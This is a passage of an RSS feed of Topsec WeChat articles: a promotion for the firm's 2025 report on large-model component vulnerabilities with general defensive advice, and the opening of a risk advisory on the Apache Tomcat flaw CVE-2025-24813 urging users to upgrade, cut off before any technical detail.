0%, rgb(226, 72, 60) 100%);"><section style=""><section style="display: inline-block;width: 30px;height: 30px;vertical-align: top;overflow: hidden;background-color: rgb(255, 255, 255);border-radius: 4px;"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section></section></section></section></section><section style="margin-bottom: 0px;"><span style="color: rgb(89, 87, 87);font-size: 15px;letter-spacing: 1px;">随着大模型架构复杂性持续提升，其面临的攻击面不断增多。<span style="font-weight: bold;">究其根本，导致缺陷与漏洞频发的主要原因，或是因为AI技术的快速发展与部分开发者“功能优先、安全滞后”的观念。</span></span></section><section style="margin-bottom: 0px;"><strong style="color: rgb(89, 87, 87);font-size: 15px;letter-spacing: 1px;"></strong></section><section style="font-size: 15px;color: rgb(89, 87, 87);letter-spacing: 1px;line-height: 1.75;"><section><p><br/></p></section><section style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;"><section style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;flex: 0 0 auto;height: auto;align-self: flex-start;"><section style="font-size: 18px;margin-right: 0%;margin-left: 0%;"><section style="display: inline-block;border-width: 1px;border-style: solid;border-color: rgb(192, 0, 0);background-color: rgb(192, 0, 0);text-align: center;width: 1.8em;height: 1.8em;line-height: 1.8em;border-radius: 100%;margin-left: auto;margin-right: auto;font-size: 11px;color: rgb(255, 255, 255);"><p><br/></p></section></section></section><section style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;"><section style="transform: translate3d(-9px, 0px, 0px);"><section style="text-align: justify;"><p>其一，AI模型作为高度复杂的代码系统，其庞大的参数规模和交互接口为潜在攻击者提供了丰富的攻击面。</p></section></section></section></section><section style="display: flex;flex-flow: row;margin: 20px 0%;text-align: left;justify-content: flex-start;"><section style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;flex: 0 0 auto;height: auto;align-self: flex-start;"><section style="font-size: 18px;margin-right: 0%;margin-left: 0%;"><section style="display: inline-block;border-width: 1px;border-style: solid;border-color: rgb(192, 0, 0);background-color: rgb(192, 0, 0);text-align: center;width: 1.8em;height: 1.8em;line-height: 1.8em;border-radius: 100%;margin-left: auto;margin-right: auto;font-size: 11px;color: rgb(255, 255, 255);"><p><br/></p></section></section></section><section style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;"><section style="transform: translate3d(-9px, 0px, 0px);"><section style="text-align: justify;"><p><span style="color: rgb(89, 87, 87);font-size: 15px;letter-spacing: 1px;">其二</span>，在激烈的市场竞争压力下，许多开发团队将研发速度置于安全考量之上，直接导致安全防护机制在设计初期的系统性缺失。</p></section></section></section></section><section><p>研究表明，当研发工作的首要目标是迭代速度时，安全评估往往被压缩至产品发布前的最后阶段，甚至完全被忽视。这种开发模式虽然能够在短期内实现技术突破，却使得AI系统暴露在诸多潜在威胁之下，为后续的安全事故埋下隐患。这些风险不仅威胁到模型的可靠性，还可能对数据隐私、系统安全以及社会伦理产生深远影响。</p><p><br/></p></section><section style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 10px 0%;"><section style="display: inline-block;vertical-align: bottom;width: auto;flex: 0 0 auto;align-self: flex-end;min-width: 10%;height: auto;"><section style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;"><section style="display: inline-block;vertical-align: bottom;width: auto;line-height: 0;flex: 0 0 0%;align-self: flex-end;height: auto;border-right: 1px solid rgba(255, 141, 150, 0.13);border-top-right-radius: 0px;padding: 5px;"><section style="text-align: center;margin-right: 0%;margin-bottom: 4px;margin-left: 0%;"><section style="display: inline-block;width: 9px;height: 9px;vertical-align: top;overflow: hidden;background-color: rgba(255, 141, 150, 0.13);"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section><section style="text-align: center;margin-right: 0%;margin-bottom: 4px;margin-left: 0%;"><section style="display: inline-block;width: 9px;height: 9px;vertical-align: top;overflow: hidden;background-color: rgba(255, 255, 255, 0);"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section><section style="text-align: center;margin-right: 0%;margin-bottom: 4px;margin-left: 0%;"><section style="display: inline-block;width: 9px;height: 9px;vertical-align: top;overflow: hidden;background-color: rgba(255, 141, 150, 0.13);"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section><section style="display: inline-block;vertical-align: bottom;width: auto;line-height: 0;flex: 0 0 0%;align-self: flex-end;height: auto;border-right: 1px solid rgba(255, 141, 150, 0.13);border-top-right-radius: 0px;padding: 5px;"><section style="text-align: center;margin-right: 0%;margin-bottom: 4px;margin-left: 0%;"><section style="display: inline-block;width: 9px;height: 9px;vertical-align: top;overflow: hidden;background-color: rgba(255, 141, 150, 0.13);"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section><section style="text-align: center;margin-right: 0%;margin-bottom: 4px;margin-left: 0%;"><section style="display: inline-block;width: 9px;height: 9px;vertical-align: top;overflow: hidden;background-color: rgba(255, 255, 255, 0);"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section><section style="text-align: center;margin-right: 0%;margin-bottom: 4px;margin-left: 0%;"><section style="display: inline-block;width: 9px;height: 9px;vertical-align: top;overflow: hidden;background-color: rgba(255, 141, 150, 0.13);"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section><section style="text-align: center;margin-right: 0%;margin-bottom: 4px;margin-left: 0%;"><section style="display: inline-block;width: 9px;height: 9px;vertical-align: top;overflow: hidden;background-color: rgba(255, 141, 150, 0.13);"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section><section style="display: inline-block;vertical-align: bottom;width: auto;line-height: 0;flex: 0 0 0%;align-self: flex-end;height: auto;border-right: 1px solid rgba(255, 141, 150, 0.13);border-top-right-radius: 0px;padding: 5px;"><section style="text-align: center;margin-right: 0%;margin-bottom: 4px;margin-left: 0%;"><section style="display: inline-block;width: 9px;height: 9px;vertical-align: top;overflow: hidden;background-color: rgba(255, 141, 150, 0.13);"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section><section style="text-align: center;margin-right: 0%;margin-bottom: 4px;margin-left: 0%;"><section style="display: inline-block;width: 9px;height: 9px;vertical-align: top;overflow: hidden;background-color: rgba(255, 141, 150, 0.13);"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section><section style="text-align: center;margin-right: 0%;margin-bottom: 4px;margin-left: 0%;"><section style="display: inline-block;width: 9px;height: 9px;vertical-align: top;overflow: hidden;background-color: rgba(255, 141, 150, 0.13);"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section><section style="display: inline-block;vertical-align: bottom;width: auto;line-height: 0;flex: 0 0 0%;align-self: flex-end;height: auto;border-right: 0px solid rgba(255, 141, 150, 0.13);border-top-right-radius: 0px;padding: 5px;"><section style="text-align: center;margin-right: 0%;margin-bottom: 4px;margin-left: 0%;"><section style="display: inline-block;width: 9px;height: 9px;vertical-align: top;overflow: hidden;background-color: rgba(255, 141, 150, 0.13);"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section><section style="text-align: center;margin-right: 0%;margin-bottom: 4px;margin-left: 0%;"><section style="display: inline-block;width: 9px;height: 9px;vertical-align: top;overflow: hidden;background-color: rgba(255, 141, 150, 0.13);"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section><section style="text-align: center;margin-right: 0%;margin-bottom: 4px;margin-left: 0%;"><section style="display: inline-block;width: 9px;height: 9px;vertical-align: top;overflow: hidden;background-color: rgba(255, 255, 255, 0);"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section><section style="text-align: center;margin-right: 0%;margin-bottom: 4px;margin-left: 0%;"><section style="display: inline-block;width: 9px;height: 9px;vertical-align: top;overflow: hidden;background-color: rgba(255, 141, 150, 0.13);"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section></section></section><section style="display: inline-block;vertical-align: bottom;width: auto;min-width: 10%;flex: 0 0 auto;height: auto;align-self: flex-end;margin-right: -20px;margin-left: -20px;z-index: 2;"><section style="margin-right: 0%;margin-left: 0%;"><section style="font-size: 18px;color: rgb(192, 0, 0);"><p><span style="font-size: 16px;"><strong>《大模型组件漏洞与应用威胁安全研究报告》</strong></span></p></section></section><section style="margin-right: 0%;margin-bottom: 5px;margin-left: 0%;"><section style="background-color: rgb(192, 0, 0);height: 1px;"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section><section style="margin-right: 0%;margin-left: 0%;"><section style="color: rgb(192, 0, 0);line-height: 1.3;font-size: 16px;"><p><strong>全流程解析大模型潜在漏洞及其影响</strong></p></section></section></section><section style="display: inline-block;vertical-align: bottom;width: auto;flex: 0 0 auto;align-self: flex-end;min-width: 10%;height: auto;"><section style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;"><section style="display: inline-block;vertical-align: bottom;width: auto;line-height: 0;flex: 0 0 0%;align-self: flex-end;height: auto;border-right: 1px solid rgba(255, 141, 150, 0.13);border-top-right-radius: 0px;padding: 5px;"><section style="text-align: center;margin-right: 0%;margin-bottom: 4px;margin-left: 0%;"><section style="display: inline-block;width: 9px;height: 9px;vertical-align: top;overflow: hidden;background-color: rgba(255, 141, 150, 0.13);"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section><section style="text-align: center;margin-right: 0%;margin-bottom: 4px;margin-left: 0%;"><section style="display: inline-block;width: 9px;height: 9px;vertical-align: top;overflow: hidden;background-color: rgba(255, 255, 255, 0);"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section><section style="text-align: center;margin-right: 0%;margin-bottom: 4px;margin-left: 0%;"><section style="display: inline-block;width: 9px;height: 9px;vertical-align: top;overflow: hidden;background-color: rgba(255, 141, 150, 0.13);"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section><section style="display: inline-block;vertical-align: bottom;width: auto;line-height: 0;flex: 0 0 0%;align-self: flex-end;height: auto;border-right: 1px solid rgba(255, 141, 150, 0.13);border-top-right-radius: 0px;padding: 5px;"><section style="text-align: center;margin-right: 0%;margin-bottom: 4px;margin-left: 0%;"><section style="display: inline-block;width: 9px;height: 9px;vertical-align: top;overflow: hidden;background-color: rgba(255, 255, 255, 0);"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section><section style="text-align: center;margin-right: 0%;margin-bottom: 4px;margin-left: 0%;"><section style="display: inline-block;width: 9px;height: 9px;vertical-align: top;overflow: hidden;background-color: rgba(255, 141, 150, 0.13);"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section><section style="text-align: center;margin-right: 0%;margin-bottom: 4px;margin-left: 0%;"><section style="display: inline-block;width: 9px;height: 9px;vertical-align: top;overflow: hidden;background-color: rgba(255, 141, 150, 0.13);"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section><section style="display: inline-block;vertical-align: bottom;width: auto;line-height: 0;flex: 0 0 0%;align-self: flex-end;height: auto;border-right: 1px solid rgba(255, 141, 150, 0.13);border-top-right-radius: 0px;padding: 5px;"><section style="text-align: center;margin-right: 0%;margin-bottom: 4px;margin-left: 0%;"><section style="display: inline-block;width: 9px;height: 9px;vertical-align: top;overflow: hidden;background-color: rgba(255, 141, 150, 0.13);"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section><section style="text-align: center;margin-right: 0%;margin-bottom: 4px;margin-left: 0%;"><section style="display: inline-block;width: 9px;height: 9px;vertical-align: top;overflow: hidden;background-color: rgba(255, 141, 150, 0.13);"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section><section style="display: inline-block;vertical-align: bottom;width: auto;line-height: 0;flex: 0 0 0%;align-self: flex-end;height: auto;border-right: 0px solid rgba(255, 141, 150, 0.13);border-top-right-radius: 0px;padding: 5px;"><section style="text-align: center;margin-right: 0%;margin-bottom: 4px;margin-left: 0%;"><section style="display: inline-block;width: 9px;height: 9px;vertical-align: top;overflow: hidden;background-color: rgba(255, 141, 150, 0.13);"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section><section style="text-align: center;margin-right: 0%;margin-bottom: 4px;margin-left: 0%;"><section style="display: inline-block;width: 9px;height: 9px;vertical-align: top;overflow: hidden;background-color: rgba(255, 255, 255, 0);"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section><section style="text-align: center;margin-right: 0%;margin-bottom: 4px;margin-left: 0%;"><section style="display: inline-block;width: 9px;height: 9px;vertical-align: top;overflow: hidden;background-color: rgba(255, 141, 150, 0.13);"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section></section></section></section><section><p><br/></p><p>基于以上背景，天融信第一时间组织安全团队针对大模型漏洞进行深入研究，并<strong>发布《大模型组件漏洞与应用威胁安全研究报告（2025）》（以下简称《报告》），全流程解析大模型潜在漏洞及其影响，并提出相应的安全建议。</strong></p><p><br/></p><p style="text-align: center;padding: 0.5em;"><img class="rich_pages wxw-img" data-cropselx1="0" data-cropselx2="321" data-cropsely1="0" data-cropsely2="454" data-galleryid="" data-imgfileid="503482641" data-ratio="1.413888888888889" data-s="300,640" style="width: 321px;box-shadow: rgb(180, 180, 180) 0px 0px 0.5em 0px;height: auto !important;" data-type="jpeg" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=df4c2556&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FnJmicCz2NYxOCo3h1p3sUq0X136ys4ibhbYQRxv9FluOo1X1d6hw0yEbeWHVqpPUpuDjbNOpAhIoBh2DuPG7tAzg%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p><p style="font-size: 15px;color: rgb(89, 87, 87);letter-spacing: 1px;line-height: 1.75;text-align: center;"><span style="font-size: 13px;">点击文末<strong>“阅读原文”</strong></span><span style="font-size: 13px;">即可获取完整报告</span></p><p><strong><br/></strong></p><p><strong>《报告》在大模型开发、部署阶段</strong>，重点对模型推理优化部署、模型训练微调、模型应用框架、其他大模型相关组件工具进行漏洞分析；<strong>在大模型使用阶段</strong>，主要针对大模型的语义操控突破安全限制生成违规内容、配置缺陷泄露敏感信息、Prompt注入利用输入劫持模型行为执行恶意指令等方面进行漏洞研究。</p><p><br/></p><section style="font-size: 15px;color: rgb(89, 87, 87);letter-spacing: 1px;line-height: 1.75;"><section style="text-align: center;justify-content: center;display: flex;flex-flow: row;margin-top: 10px;margin-bottom: 10px;"><section style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;height: auto;background-color: rgb(240, 239, 239);padding: 26px;"><section style="justify-content: center;display: flex;flex-flow: row;"><section style="display: inline-block;vertical-align: top;align-self: flex-start;flex: 0 0 auto;width: auto;min-width: 5%;height: auto;background-color: rgb(192, 0, 0);"><section style=""><section style="font-size: 11px;color: rgb(255, 255, 255);text-align: justify;"><p><strong>TOPSEC</strong></p></section></section></section><section style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;margin-left: 20px;"><section style=""><section style="border-top: 1px dashed rgb(192, 0, 0);"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section></section><section style="text-align: justify;"><p><br/></p></section><section style=""><section style="text-align: justify;"><p><strong>《报告》认为大模型安全问题体现在多个层面。其在部署阶段的安全漏洞与传统网络安全的通用漏洞高度相似。但在使用阶段，则存在其特有的内容安全问题，这些漏洞可能源于模型本身的特性。</strong>例如生成内容的不可控性、对输入指令的过度依赖，以及多模态交互中的潜在风险。</p></section></section><section style="text-align: justify;"><p><br/></p></section><section style="margin-bottom: 8px;"><section style="border-top: 1px dashed rgb(192, 0, 0);"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section></section></section><p><br/></p></section><section><p>此外，AI模型的部署环境复杂多样，系统级的安全漏洞可能带来新的攻击向量。例如，AI系统的基础设施或与外部数据源的连接可能成为攻击者的突破口。</p><p><br/></p></section><section style="display: flex;flex-flow: row;justify-content: flex-start;"><section style="display: inline-block;vertical-align: middle;width: auto;line-height: 0;flex: 0 0 0%;height: auto;align-self: center;"><section style="text-align: center;"><section style="display: inline-block;width: 0px;height: 0px;vertical-align: top;overflow: hidden;border-style: solid;border-width: 11px 8px 0px;border-color: rgb(192, 0, 0) rgba(255, 255, 255, 0) rgba(255, 255, 255, 0);"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section><section style="display: inline-block;vertical-align: middle;width: auto;min-width: 10%;flex: 0 0 auto;height: auto;align-self: center;"><section style="font-size: 16px;line-height: 1.8;padding-right: 21px;padding-left: 21px;"><p><strong><br/></strong></p></section></section></section><section style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;"><section style="display: inline-block;width: auto;vertical-align: top;border-left: 1px solid rgb(192, 0, 0);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;margin-right: 10px;margin-left: 8px;"><section style="margin: 4px 0%;text-align: center;"><section style="padding-right: 30px;padding-left: 30px;text-align: justify;"><p>对于大模型所涉及组件，需从整体上重视安全建设，构建多层次、多维度的防御体系。有研究资料表明，在学术界中当前大模型攻防研究约60%集中在攻击方法上，而防御相关研究仅占40%，更多是“被动应对”而非“主动防御”。</p></section></section></section></section><section style="display: flex;flex-flow: row;justify-content: flex-start;"><section style="display: inline-block;vertical-align: middle;width: auto;line-height: 0;flex: 0 0 0%;height: auto;align-self: center;"><section style="text-align: center;"><section style="display: inline-block;width: 0px;height: 0px;vertical-align: top;overflow: hidden;border-style: solid;border-width: 11px 8px 0px;border-color: rgb(192, 0, 0) rgba(255, 255, 255, 0) rgba(255, 255, 255, 0);"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section><section style="display: inline-block;vertical-align: middle;width: auto;min-width: 10%;flex: 0 0 auto;height: auto;align-self: center;"><section style="font-size: 16px;line-height: 1.8;padding-right: 21px;padding-left: 21px;"><p><strong><br/></strong></p></section></section></section><section style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;"><section style="display: inline-block;width: auto;vertical-align: top;border-left: 1px solid rgb(192, 0, 0);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;margin-right: 10px;margin-left: 8px;"><section style="margin: 4px 0%;text-align: center;"><section style="padding-right: 30px;padding-left: 30px;text-align: justify;"><p><span style="color: rgb(89, 87, 87);font-size: 15px;letter-spacing: 1px;">对于大模型使用安全，需要强调模型开源、提供专用安全API以及建立开源安全平台，以构建更安全可信的人工智能生态系统。</span><span style="color: rgb(89, 87, 87);font-size: 15px;letter-spacing: 1px;">如清华团队最近推出“安全增强版 DeepSeek”，开源不仅能够促进技术透明性，还能吸引更多研究者参与防御技术的开发与优化。</span></p></section></section></section></section><section style="display: flex;flex-flow: row;justify-content: flex-start;"><section style="display: inline-block;vertical-align: middle;width: auto;line-height: 0;flex: 0 0 0%;height: auto;align-self: center;"><section style="text-align: center;"><section style="display: inline-block;width: 0px;height: 0px;vertical-align: top;overflow: hidden;border-style: solid;border-width: 11px 8px 0px;border-color: rgb(192, 0, 0) rgba(255, 255, 255, 0) rgba(255, 255, 255, 0);"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section><section style="display: inline-block;vertical-align: middle;width: auto;min-width: 10%;flex: 0 0 auto;height: auto;align-self: center;"><section style="font-size: 16px;line-height: 1.8;padding-right: 21px;padding-left: 21px;"><p><strong><br/></strong></p></section></section></section><section style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;"><section style="display: inline-block;width: auto;vertical-align: top;border-left: 1px solid rgb(192, 0, 0);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;margin-right: 10px;margin-left: 8px;"><section style="margin: 4px 0%;text-align: center;"><section style="padding-right: 30px;padding-left: 30px;text-align: justify;"><p>对于个人或企业部署大模型，提高警惕性和持续监控都是实现安全有效防护的关键环节。首先，部署时应严格审查组件和工具的来源，避免使用不可信的资源，以降低遭受安全攻击的风险。其次，持续关注组件安全情报，及时修复已知漏洞，避免成为Nday漏洞攻击的目标。</p></section></section></section></section><section style="text-align: center;justify-content: center;display: flex;flex-flow: row;margin-top: 10px;margin-bottom: 10px;"><section style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 0 0 0%;height: auto;line-height: 0;"><section style="transform: translate3d(-6px, 0px, 0px);margin-bottom: -7px;"><br/></section></section></section></section><section style="font-size: 16px;color: rgb(62, 62, 62);"><section style="text-align: center;justify-content: center;display: flex;flex-flow: row;margin-top: 10px;margin-bottom: 10px;"><section style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 0 0 0%;height: auto;line-height: 0;"><section style="transform: translate3d(-6px, 0px, 0px);margin-bottom: -7px;"><section style="display: inline-block;width: 15px;height: 15px;vertical-align: top;overflow: hidden;border-width: 0px;border-radius: 100%;border-style: none;border-color: rgb(62, 62, 62);background-color: rgb(192, 0, 0);"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section><section style=""><section style="display: inline-block;width: 12px;height: 12px;vertical-align: top;overflow: hidden;border-width: 1px;border-radius: 100%;border-style: solid;border-color: rgb(192, 0, 0);"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section><section style="display: inline-block;vertical-align: middle;width: auto;min-width: 5%;flex: 0 0 auto;height: auto;align-self: center;padding-right: 10px;padding-left: 10px;"><section style="color: rgb(192, 0, 0);"><p><strong>点击文末“阅读原文”</strong></p><p><strong>即可获取完整报告</strong></p><p><strong>↓↓↓</strong></p></section></section><section style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 0 0 auto;min-width: 5%;height: auto;line-height: 0;"><section style="transform: translate3d(6px, 0px, 0px);margin-bottom: -7px;"><section style="display: inline-block;width: 15px;height: 15px;vertical-align: top;overflow: hidden;border-width: 0px;border-radius: 100%;border-style: none;border-color: rgb(62, 62, 62);background-color: rgb(192, 0, 0);"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section><section style=""><section style="display: inline-block;width: 13px;height: 13px;vertical-align: top;overflow: hidden;border-width: 1px;border-radius: 100%;border-style: solid;border-color: rgb(192, 0, 0);"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section></section></section><section style="margin-bottom: 0px;outline: 0px;color: rgb(89, 87, 87);font-size: 15px;letter-spacing: 0.578px;"><section data-style="white-space: normal; font-family: -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif; letter-spacing: 0.544px; background-color: rgb(255, 255, 255);" style="outline: 0px;font-size: 16px;letter-spacing: 0.544px;color: rgb(62, 62, 62);font-family: -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;visibility: visible;"><section powered-by="xiumi.us" style="outline: 0px;line-height: 1.75;font-size: 15px;visibility: visible;"><section style="outline: 0px;letter-spacing: 0.544px;visibility: visible;"><section data-support="96编辑器" data-style-id="28416" style="outline: 0px;visibility: visible;"><section style="outline: 0px;color: rgb(89, 87, 87);letter-spacing: 1px;line-height: 1.75;visibility: visible;"><section style="outline: 0px;"><br/></section><section class="mp_profile_iframe_wrp" style="outline: 0px;"><mp-common-profile class="custom_select_card mp_profile_iframe" data-pluginname="mpprofile" data-id="MzA3OTMxNTcxNA==" data-headimg="http://mmbiz.qpic.cn/mmbiz_png/nJmicCz2NYxPiazyASKVba57ReFHFEqicHGum3FRLQza0a8624LIibogluysp3HQgcztqd1HUchOdIDwak46dKT1IQ/300?wx_fmt=png&amp;wxfrom=19" data-nickname="天融信" data-alias="TopsecPioneer" data-signature="天融信（002212.SZ）围绕网络安全、大数据与云服务三大业务持续创新，以安全护航各行业客户数字化转型。" data-from="2" data-origin_num="3" data-isban="0" data-biz_account_status="0" data-index="0"></mp-common-profile></section></section></section></section></section></section></section><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://www.topsec.com.cn/newsx/5794?sessionid=-1568187922">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=db46027f&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3MDAzMDQxNw%3D%3D%26mid%3D2247496682%26idx%3D1%26sn%3De4643091842bb9fe7d576a85fe1e129a%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 17 Mar 2025 13:39:00 +0800</pubDate>
    </item>
    <item>
      <title>【风险提示】天融信关于Apache Tomcat 远程代码执行漏洞(CVE-2025-24813)的风险提示</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3MDAzMDQxNw==&amp;mid=2247496672&amp;idx=1&amp;sn=61480ecdb85f33408d2809e9d5d45378</link>
      <description>3月11日，天融信阿尔法实验室监测到Tomcat官方发布了一个安全公告，修复了一个特定条件的远程代码执行漏洞（CVE-2025-24813）。建议受影响用户尽快升级。</description>
      <content:encoded><![CDATA[<p>
<span>天融信应急响应</span> <span>2025-03-11 20:04</span> <span style="display: inline-block;">北京</span>
</p>

<p>3月11日，天融信阿尔法实验室监测到Tomcat官方发布了一个安全公告，修复了一个特定条件的远程代码执行漏洞（CVE-2025-24813）。建议受影响用户尽快升级。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=719e56ca&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FH6W1QCHf9dEz5MyoJ5sBcBlSEhVxL3OlxNtB4bVa6L14c4TKTDKUR7R8ZPx2muYDz9L9OHpymfJfM0KACK3SPA%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-cropselx1="0" data-cropselx2="578" data-cropsely1="0" data-cropsely2="191" data-imgfileid="100012988" data-ratio="0.5628415300546448" data-s="300,640" style="width: 578px;height: 325px;" data-type="png" data-w="366" src="https://wechat2rss.xlab.app/img-proxy/?k=f2cf01c5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FH6W1QCHf9dFOz59Asznibb3bxNXp3dr4XSB3hib7J4SibWUD2JDsa3iamk7Igl0KD3ic5mZzyAQf79FMswrLMtxe9icg%2F640%3Fwx_fmt%3Djpeg"/></p><p style="margin-bottom: 0px;white-space: normal;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x00 背景介绍</span></strong><br/></p><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;"><span style="font-size: 14px;"><br/></span></p><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;"><span style="font-size: 14px;">3月11日，天融信阿尔法实验室监测到Tomcat官方发布了一个安全公告，修复了一个特定条件的远程代码执行漏洞（CVE-2025-24813），建议受影响用户尽快升级。</span></p><section style="margin-bottom: 0px;text-indent: 0em;white-space: normal;line-height: 25.5px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: 